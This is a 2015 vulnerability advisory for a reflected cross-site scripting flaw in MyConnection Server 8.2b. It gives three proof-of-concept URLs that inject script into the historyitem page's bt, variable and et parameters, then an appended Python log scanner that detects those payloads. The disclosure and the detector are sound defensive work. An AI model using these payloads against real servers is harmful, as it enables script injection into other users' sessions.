Title: MyConnection Server 8.2b GET Reflected XSS
Severity: High
CVE-ID: CVE-2015-2043
Release Date: 23 February 2015
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
          http://xssWarrior.com
          http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://www.myconnectionserver.com/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com

Description:
============
The application MyConnection Server 8.2b suffers from XSS vulnerabilities in three fields in the historyitem page. The three fields are:

bt=
variable=
et=

Proof of Concept:
==================
http://vulnsite.com/myspeed/db/historyitem?bt="');+alert(10);+//
http://vulnsite.com/myspeed/db/historyitem?variable="');+alert(10);+//
http://vulnsite.com/myspeed/db/historyitem?et="');+alert(10);+//
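
Detection example (added here, not part of the original advisory or the vendor's code): a log check that flags requests to the historyitem page whose bt, variable or et value decodes to characters of the kind used in the proof-of-concept URLs. The combined access-log format, the sample log lines and the numeric "normal" values are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path and parameter names are taken from the advisory.
VULN_PATH = "/myspeed/db/historyitem"
VULN_PARAMS = {"bt", "variable", "et"}
# Characters the proof-of-concept values contain, plus angle brackets and backslash.
BREAKOUT = set("\"'<>();\\")
# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Feb/2015:10:00:01 +0000] "GET /myspeed/db/historyitem?bt=1424685600&et=1424689200 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Feb/2015:10:02:13 +0000] "GET /myspeed/db/historyitem?bt=%22%27);+alert(10);+// HTTP/1.1" 200 5342',
    '198.51.100.7 - - [23/Feb/2015:10:02:40 +0000] "GET /myspeed/db/historyitem?variable=%22%27);+alert(10);+// HTTP/1.1" 200 5342',
    '203.0.113.5 - - [23/Feb/2015:10:05:00 +0000] "GET /index.html?et=%22%27); HTTP/1.1" 404 210',
]

def suspicious_params(target):
    """Return (param, decoded_value) pairs on the historyitem page that carry breakout characters."""
    parts = urlsplit(target)
    if parts.path.rstrip("/").lower() != VULN_PATH:
        return []
    # parse_qsl percent-decodes once and turns '+' into a space before the check.
    return [
        (name, value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
        if name.lower() in VULN_PARAMS and BREAKOUT & set(value)
    ]

def scan(lines):
    """Return (line_number, client, hits) for each log line that trips the check."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group(1))
        if hits:
            findings.append((n, line.split(" ", 1)[0], hits))
    return findings

if __name__ == "__main__":
    for n, client, hits in scan(SAMPLE_LOG):
        print(n, client, hits)
```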